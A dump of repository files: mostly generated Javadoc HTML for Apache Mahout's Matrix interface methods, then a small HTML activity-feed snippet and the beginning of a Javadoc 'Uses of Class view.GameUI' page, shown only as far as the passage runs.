<DD>Assign the other vector values to the row of the receiver
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>row</CODE> - the int row to assign<DD><CODE>other</CODE> - a Vector
<DT><B>Returns:</B><DD>the modified receiver
<DT><B>Throws:</B>
<DD><CODE><A HREF="../../../../org/apache/mahout/math/CardinalityException.html" title="class in org.apache.mahout.math">CardinalityException</A></CODE> - if the cardinalities differ</DL>
</DD>
</DL>
<HR>
<A NAME="aggregateRows(org.apache.mahout.math.function.VectorFunction)"><!-- --></A><H3>
aggregateRows</H3>
<PRE>
<A HREF="../../../../org/apache/mahout/math/Vector.html" title="interface in org.apache.mahout.math">Vector</A> <B>aggregateRows</B>(<A HREF="../../../../org/apache/mahout/math/function/VectorFunction.html" title="interface in org.apache.mahout.math.function">VectorFunction</A> f)</PRE>
<DL>
<DD>Collects the results of a function applied to each row of a matrix.
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>f</CODE> - The function to be applied to each row.
<DT><B>Returns:</B><DD>The vector of results.</DL>
</DD>
</DL>
<HR>
<A NAME="aggregateColumns(org.apache.mahout.math.function.VectorFunction)"><!-- --></A><H3>
aggregateColumns</H3>
<PRE>
<A HREF="../../../../org/apache/mahout/math/Vector.html" title="interface in org.apache.mahout.math">Vector</A> <B>aggregateColumns</B>(<A HREF="../../../../org/apache/mahout/math/function/VectorFunction.html" title="interface in org.apache.mahout.math.function">VectorFunction</A> f)</PRE>
<DL>
<DD>Collects the results of a function applied to each column of a matrix.
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>f</CODE> - The function to be applied to each column.
<DT><B>Returns:</B><DD>The vector of results.</DL>
</DD>
</DL>
<HR>
<A NAME="aggregate(org.apache.mahout.math.function.DoubleDoubleFunction, org.apache.mahout.math.function.DoubleFunction)"><!-- --></A><H3>
aggregate</H3>
<PRE>
double <B>aggregate</B>(<A HREF="../../../../org/apache/mahout/math/function/DoubleDoubleFunction.html" title="interface in org.apache.mahout.math.function">DoubleDoubleFunction</A> combiner,
<A HREF="../../../../org/apache/mahout/math/function/DoubleFunction.html" title="interface in org.apache.mahout.math.function">DoubleFunction</A> mapper)</PRE>
<DL>
<DD>Collects the results of a function applied to each element of a matrix and then
aggregated.
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>combiner</CODE> - A function that combines the results of the mapper.<DD><CODE>mapper</CODE> - A function to apply to each element.
<DT><B>Returns:</B><DD>The result.</DL>
</DD>
</DL>
<HR>
<A NAME="size()"><!-- --></A><H3>
size</H3>
<PRE>
int[] <B>size</B>()</PRE>
<DL>
<DD>Return the cardinality of the recipient (the maximum number of values)
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>an int[2]</DL>
</DD>
</DL>
<HR>
<A NAME="columnSize()"><!-- --></A><H3>
columnSize</H3>
<PRE>
int <B>columnSize</B>()</PRE>
<DL>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>The number of rows in the matrix.</DL>
</DD>
</DL>
<HR>
<A NAME="rowSize()"><!-- --></A><H3>
rowSize</H3>
<PRE>
int <B>rowSize</B>()</PRE>
<DL>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>Returns the number of rows in the matrix.</DL>
</DD>
</DL>
<HR>
<A NAME="clone()"><!-- --></A><H3>
clone</H3>
<PRE>
<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> <B>clone</B>()</PRE>
<DL>
<DD>Return a copy of the recipient
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>a new Matrix</DL>
</DD>
</DL>
<HR>
<A NAME="determinant()"><!-- --></A><H3>
determinant</H3>
<PRE>
double <B>determinant</B>()</PRE>
<DL>
<DD>Returns matrix determinator using Laplace theorem
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>a matrix determinator</DL>
</DD>
</DL>
<HR>
<A NAME="divide(double)"><!-- --></A><H3>
divide</H3>
<PRE>
<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> <B>divide</B>(double x)</PRE>
<DL>
<DD>Return a new matrix containing the values of the recipient divided by the argument
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>x</CODE> - a double value
<DT><B>Returns:</B><DD>a new Matrix</DL>
</DD>
</DL>
<HR>
<A NAME="get(int, int)"><!-- --></A><H3>
get</H3>
<PRE>
double <B>get</B>(int row,
int column)</PRE>
<DL>
<DD>Return the value at the given indexes
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>row</CODE> - an int row index<DD><CODE>column</CODE> - an int column index
<DT><B>Returns:</B><DD>the double at the index
<DT><B>Throws:</B>
<DD><CODE><A HREF="../../../../org/apache/mahout/math/IndexException.html" title="class in org.apache.mahout.math">IndexException</A></CODE> - if the index is out of bounds</DL>
</DD>
</DL>
<HR>
<A NAME="getColumn(int)"><!-- --></A><H3>
getColumn</H3>
<PRE>
<A HREF="../../../../org/apache/mahout/math/Vector.html" title="interface in org.apache.mahout.math">Vector</A> <B>getColumn</B>(int column)</PRE>
<DL>
<DD>Return the column at the given index
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>column</CODE> - an int column index
<DT><B>Returns:</B><DD>a Vector at the index
<DT><B>Throws:</B>
<DD><CODE><A HREF="../../../../org/apache/mahout/math/IndexException.html" title="class in org.apache.mahout.math">IndexException</A></CODE> - if the index is out of bounds</DL>
</DD>
</DL>
<HR>
<A NAME="getRow(int)"><!-- --></A><H3>
getRow</H3>
<PRE>
<A HREF="../../../../org/apache/mahout/math/Vector.html" title="interface in org.apache.mahout.math">Vector</A> <B>getRow</B>(int row)</PRE>
<DL>
<DD>Return the row at the given index
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>row</CODE> - an int row index
<DT><B>Returns:</B><DD>a Vector at the index
<DT><B>Throws:</B>
<DD><CODE><A HREF="../../../../org/apache/mahout/math/IndexException.html" title="class in org.apache.mahout.math">IndexException</A></CODE> - if the index is out of bounds</DL>
</DD>
</DL>
<HR>
<A NAME="getQuick(int, int)"><!-- --></A><H3>
getQuick</H3>
<PRE>
double <B>getQuick</B>(int row,
int column)</PRE>
<DL>
<DD>Return the value at the given indexes, without checking bounds
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>row</CODE> - an int row index<DD><CODE>column</CODE> - an int column index
<DT><B>Returns:</B><DD>the double at the index</DL>
</DD>
</DL>
<HR>
<A NAME="like()"><!-- --></A><H3>
like</H3>
<PRE>
<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> <B>like</B>()</PRE>
<DL>
<DD>Return an empty matrix of the same underlying class as the receiver
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>a Matrix</DL>
</DD>
</DL>
<HR>
<A NAME="like(int, int)"><!-- --></A><H3>
like</H3>
<PRE>
<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> <B>like</B>(int rows,
int columns)</PRE>
<DL>
<DD>Returns an empty matrix of the same underlying class as the receiver and of the specified size.
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>rows</CODE> - the int number of rows<DD><CODE>columns</CODE> - the int number of columns</DL>
</DD>
</DL>
<HR>
<A NAME="minus(org.apache.mahout.math.Matrix)"><!-- --></A><H3>
minus</H3>
<PRE>
<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> <B>minus</B>(<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> x)</PRE>
<DL>
<DD>Return a new matrix containing the element by element difference of the recipient and the argument
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>x</CODE> - a Matrix
<DT><B>Returns:</B><DD>a new Matrix
<DT><B>Throws:</B>
<DD><CODE><A HREF="../../../../org/apache/mahout/math/CardinalityException.html" title="class in org.apache.mahout.math">CardinalityException</A></CODE> - if the cardinalities differ</DL>
</DD>
</DL>
<HR>
<A NAME="plus(double)"><!-- --></A><H3>
plus</H3>
<PRE>
<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> <B>plus</B>(double x)</PRE>
<DL>
<DD>Return a new matrix containing the sum of each value of the recipient and the argument
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>x</CODE> - a double
<DT><B>Returns:</B><DD>a new Matrix</DL>
</DD>
</DL>
<HR>
<A NAME="plus(org.apache.mahout.math.Matrix)"><!-- --></A><H3>
plus</H3>
<PRE>
<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> <B>plus</B>(<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> x)</PRE>
<DL>
<DD>Return a new matrix containing the element by element sum of the recipient and the argument
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>x</CODE> - a Matrix
<DT><B>Returns:</B><DD>a new Matrix
<DT><B>Throws:</B>
<DD><CODE><A HREF="../../../../org/apache/mahout/math/CardinalityException.html" title="class in org.apache.mahout.math">CardinalityException</A></CODE> - if the cardinalities differ</DL>
</DD>
</DL>
<HR>
<A NAME="set(int, int, double)"><!-- --></A><H3>
set</H3>
<PRE>
void <B>set</B>(int row,
int column,
double value)</PRE>
<DL>
<DD>Set the value at the given index
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>row</CODE> - an int row index into the receiver<DD><CODE>column</CODE> - an int column index into the receiver<DD><CODE>value</CODE> - a double value to set
<DT><B>Throws:</B>
<DD><CODE><A HREF="../../../../org/apache/mahout/math/IndexException.html" title="class in org.apache.mahout.math">IndexException</A></CODE> - if the index is out of bounds</DL>
</DD>
</DL>
<HR>
<A NAME="set(int, double[])"><!-- --></A><H3>
set</H3>
<PRE>
void <B>set</B>(int row,
double[] data)</PRE>
<DL>
<DD><DL>
</DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="setQuick(int, int, double)"><!-- --></A><H3>
setQuick</H3>
<PRE>
void <B>setQuick</B>(int row,
int column,
double value)</PRE>
<DL>
<DD>Set the value at the given index, without checking bounds
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>row</CODE> - an int row index into the receiver<DD><CODE>column</CODE> - an int column index into the receiver<DD><CODE>value</CODE> - a double value to set</DL>
</DD>
</DL>
<HR>
<A NAME="getNumNondefaultElements()"><!-- --></A><H3>
getNumNondefaultElements</H3>
<PRE>
int[] <B>getNumNondefaultElements</B>()</PRE>
<DL>
<DD>Return the number of values in the recipient
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>an int[2] containing [row, column] count</DL>
</DD>
</DL>
<HR>
<A NAME="times(double)"><!-- --></A><H3>
times</H3>
<PRE>
<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> <B>times</B>(double x)</PRE>
<DL>
<DD>Return a new matrix containing the product of each value of the recipient and the argument
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>x</CODE> - a double argument
<DT><B>Returns:</B><DD>a new Matrix</DL>
</DD>
</DL>
<HR>
<A NAME="times(org.apache.mahout.math.Matrix)"><!-- --></A><H3>
times</H3>
<PRE>
<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> <B>times</B>(<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> x)</PRE>
<DL>
<DD>Return a new matrix containing the product of the recipient and the argument
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>x</CODE> - a Matrix argument
<DT><B>Returns:</B><DD>a new Matrix
<DT><B>Throws:</B>
<DD><CODE><A HREF="../../../../org/apache/mahout/math/CardinalityException.html" title="class in org.apache.mahout.math">CardinalityException</A></CODE> - if the cardinalities are incompatible</DL>
</DD>
</DL>
<HR>
<A NAME="transpose()"><!-- --></A><H3>
transpose</H3>
<PRE>
<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> <B>transpose</B>()</PRE>
<DL>
<DD>Return a new matrix that is the transpose of the receiver
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>the transpose</DL>
</DD>
</DL>
<HR>
<A NAME="viewPart(int[], int[])"><!-- --></A><H3>
viewPart</H3>
<PRE>
<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> <B>viewPart</B>(int[] offset,
int[] size)</PRE>
<DL>
<DD>Return a new matrix containing the subset of the recipient
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>offset</CODE> - an int[2] offset into the receiver<DD><CODE>size</CODE> - the int[2] size of the desired result
<DT><B>Returns:</B><DD>a new Matrix that is a view of the original
<DT><B>Throws:</B>
<DD><CODE><A HREF="../../../../org/apache/mahout/math/CardinalityException.html" title="class in org.apache.mahout.math">CardinalityException</A></CODE> - if the length is greater than the cardinality of the receiver
<DD><CODE><A HREF="../../../../org/apache/mahout/math/IndexException.html" title="class in org.apache.mahout.math">IndexException</A></CODE> - if the offset is negative or the offset+length is outside of the receiver</DL>
</DD>
</DL>
<HR>
<A NAME="viewPart(int, int, int, int)"><!-- --></A><H3>
viewPart</H3>
<PRE>
<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> <B>viewPart</B>(int rowOffset,
int rowsRequested,
int columnOffset,
int columnsRequested)</PRE>
<DL>
<DD>Return a new matrix containing the subset of the recipient
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>rowOffset</CODE> - The first row of the view<DD><CODE>rowsRequested</CODE> - The number of rows in the view<DD><CODE>columnOffset</CODE> - The first column in the view<DD><CODE>columnsRequested</CODE> - The number of columns in the view
<DT><B>Returns:</B><DD>a new Matrix that is a view of the original
<DT><B>Throws:</B>
<DD><CODE><A HREF="../../../../org/apache/mahout/math/CardinalityException.html" title="class in org.apache.mahout.math">CardinalityException</A></CODE> - if the length is greater than the cardinality of the receiver
<DD><CODE><A HREF="../../../../org/apache/mahout/math/IndexException.html" title="class in org.apache.mahout.math">IndexException</A></CODE> - if the offset is negative or the offset+length is outside of the
receiver</DL>
</DD>
</DL>
<HR>
<A NAME="zSum()"><!-- --></A><H3>
zSum</H3>
<PRE>
double <B>zSum</B>()</PRE>
<DL>
<DD>Return the sum of all the elements of the receiver
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>a double</DL>
</DD>
</DL>
<HR>
<A NAME="getColumnLabelBindings()"><!-- --></A><H3>
getColumnLabelBindings</H3>
<PRE>
<A HREF="http://download.oracle.com/javase/6/docs/api/java/util/Map.html?is-external=true" title="class or interface in java.util">Map</A><<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A>,<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/Integer.html?is-external=true" title="class or interface in java.lang">Integer</A>> <B>getColumnLabelBindings</B>()</PRE>
<DL>
<DD>Return a map of the current column label bindings of the receiver
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>a Map<String, Integer></DL>
</DD>
</DL>
<HR>
<A NAME="getRowLabelBindings()"><!-- --></A><H3>
getRowLabelBindings</H3>
<PRE>
<A HREF="http://download.oracle.com/javase/6/docs/api/java/util/Map.html?is-external=true" title="class or interface in java.util">Map</A><<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A>,<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/Integer.html?is-external=true" title="class or interface in java.lang">Integer</A>> <B>getRowLabelBindings</B>()</PRE>
<DL>
<DD>Return a map of the current row label bindings of the receiver
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>a Map<String, Integer></DL>
</DD>
</DL>
<HR>
<A NAME="setColumnLabelBindings(java.util.Map)"><!-- --></A><H3>
setColumnLabelBindings</H3>
<PRE>
void <B>setColumnLabelBindings</B>(<A HREF="http://download.oracle.com/javase/6/docs/api/java/util/Map.html?is-external=true" title="class or interface in java.util">Map</A><<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A>,<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/Integer.html?is-external=true" title="class or interface in java.lang">Integer</A>> bindings)</PRE>
<DL>
<DD>Sets a map of column label bindings in the receiver
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>bindings</CODE> - a Map<String, Integer> of label bindings</DL>
</DD>
</DL>
<HR>
<A NAME="setRowLabelBindings(java.util.Map)"><!-- --></A><H3>
setRowLabelBindings</H3>
<PRE>
void <B>setRowLabelBindings</B>(<A HREF="http://download.oracle.com/javase/6/docs/api/java/util/Map.html?is-external=true" title="class or interface in java.util">Map</A><<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A>,<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/Integer.html?is-external=true" title="class or interface in java.lang">Integer</A>> bindings)</PRE>
<DL>
<DD>Sets a map of row label bindings in the receiver
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>bindings</CODE> - a Map<String, Integer> of label bindings</DL>
</DD>
</DL>
<HR>
<A NAME="get(java.lang.String, java.lang.String)"><!-- --></A><H3>
get</H3>
<PRE>
double <B>get</B>(<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A> rowLabel,
<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A> columnLabel)</PRE>
<DL>
<DD>Return the value at the given labels
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>rowLabel</CODE> - a String row label<DD><CODE>columnLabel</CODE> - a String column label
<DT><B>Returns:</B><DD>the double at the index
<DT><B>Throws:</B>
<DD><CODE><A HREF="../../../../org/apache/mahout/math/IndexException.html" title="class in org.apache.mahout.math">IndexException</A></CODE> - if the index is out of bounds</DL>
</DD>
</DL>
<HR>
<A NAME="set(java.lang.String, java.lang.String, double)"><!-- --></A><H3>
set</H3>
<PRE>
void <B>set</B>(<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A> rowLabel,
<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A> columnLabel,
double value)</PRE>
<DL>
<DD>Set the value at the given index
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>rowLabel</CODE> - a String row label<DD><CODE>columnLabel</CODE> - a String column label<DD><CODE>value</CODE> - a double value to set
<DT><B>Throws:</B>
<DD><CODE><A HREF="../../../../org/apache/mahout/math/IndexException.html" title="class in org.apache.mahout.math">IndexException</A></CODE> - if the index is out of bounds</DL>
</DD>
</DL>
<HR>
<A NAME="set(java.lang.String, java.lang.String, int, int, double)"><!-- --></A><H3>
set</H3>
<PRE>
void <B>set</B>(<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A> rowLabel,
<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A> columnLabel,
int row,
int column,
double value)</PRE>
<DL>
<DD>Set the value at the given index, updating the row and column label bindings
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>rowLabel</CODE> - a String row label<DD><CODE>columnLabel</CODE> - a String column label<DD><CODE>row</CODE> - an int row index<DD><CODE>column</CODE> - an int column index<DD><CODE>value</CODE> - a double value</DL>
</DD>
</DL>
<HR>
<A NAME="set(java.lang.String, double[])"><!-- --></A><H3>
set</H3>
<PRE>
void <B>set</B>(<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A> rowLabel,
double[] rowData)</PRE>
<DL>
<DD>Sets the row values at the given row label
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>rowLabel</CODE> - a String row label<DD><CODE>rowData</CODE> - a double[] array of row data</DL>
</DD>
</DL>
<HR>
<A NAME="set(java.lang.String, int, double[])"><!-- --></A><H3>
set</H3>
<PRE>
void <B>set</B>(<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A> rowLabel,
int row,
double[] rowData)</PRE>
<DL>
<DD>Sets the row values at the given row index and updates the row labels
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>rowLabel</CODE> - the String row label<DD><CODE>row</CODE> - an int the row index<DD><CODE>rowData</CODE> - a double[] array of row data</DL>
</DD>
</DL>
<HR>
<A NAME="viewRow(int)"><!-- --></A><H3>
viewRow</H3>
<PRE>
<A HREF="../../../../org/apache/mahout/math/Vector.html" title="interface in org.apache.mahout.math">Vector</A> <B>viewRow</B>(int row)</PRE>
<DL>
<DD><DL>
</DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="viewColumn(int)"><!-- --></A><H3>
viewColumn</H3>
<PRE>
<A HREF="../../../../org/apache/mahout/math/Vector.html" title="interface in org.apache.mahout.math">Vector</A> <B>viewColumn</B>(int column)</PRE>
<DL>
<DD><DL>
</DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<!-- ========= END OF CLASS DATA ========= -->
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/Matrix.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../org/apache/mahout/math/IndexException.html" title="class in org.apache.mahout.math"><B>PREV CLASS</B></A>
<A HREF="../../../../org/apache/mahout/math/MatrixSlice.html" title="class in org.apache.mahout.math"><B>NEXT CLASS</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../index.html?org/apache/mahout/math/Matrix.html" target="_top"><B>FRAMES</B></A>
<A HREF="Matrix.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: NESTED | FIELD | CONSTR | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: FIELD | CONSTR | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<HR>
Copyright © 2008-2011 <a href="http://www.apache.org/">The Apache Software Foundation</a>. All Rights Reserved.
</BODY>
</HTML>
|
themes/starlight/ajax/activities.php.html | mentordeveloper/ums | <ul class="msglist">
<li class="user new">
<div class="msg">
<a href="">Justin Meller</a> added <a href="">John Doe</a> as Admin.
</div>
</li>
<li class="call new">
<div class="msg">
You missed a call from <a href="">Porfirio</a>
</div>
</li>
<li class="calendar new">
<div class="msg">
<a href="">Katherine Kate</a> invited you in an event <a href="">Rock Party</a>.
</div>
</li>
<li class="settings">
<div class="msg">
<a href="">Jane Doe</a> updated her profile.
</div>
</li>
<li class="user">
<div class="msg">
<a href="">Jet Lee</a> is now following you.
</div>
</li>
</ul>
<div class="msgmore"><a href="">View All Activities</a></div> |
javadoc/view/class-use/GameUI.html | robertoramsis/FunLearn | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_79) on Fri Jun 12 01:06:57 PDT 2015 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Uses of Class view.GameUI</title>
<meta name="date" content="2015-06-12">
<link rel="stylesheet" type="text/css" href="../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Class view.GameUI";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../view/GameUI.html" title="class in view">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../../overview-tree.html">Tree</a></li>
<li><a href="../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../index-files/index-1.html">Index</a></li>
<li><a href="../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../index.html?view/class-use/GameUI.html" target="_top">Frames</a></li>
<li><a href="GameUI.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h2 title="Uses of Class view.GameUI" class="title">Uses of Class<br>view.GameUI</h2>
</div>
<div class="classUseContainer">
<ul class="blockList">
<li class="blockList">
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing packages, and an explanation">
<caption><span>Packages that use <a href="../../view/GameUI.html" title="class in view">GameUI</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Package</th>
<th class="colLast" scope="col">Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><a href="#controller">controller</a></td>
<td class="colLast"> </td>
</tr>
</tbody>
</table>
</li>
<li class="blockList">
<ul class="blockList">
<li class="blockList"><a name="controller">
<!-- -->
</a>
<h3>Uses of <a href="../../view/GameUI.html" title="class in view">GameUI</a> in <a href="../../controller/package-summary.html">controller</a></h3>
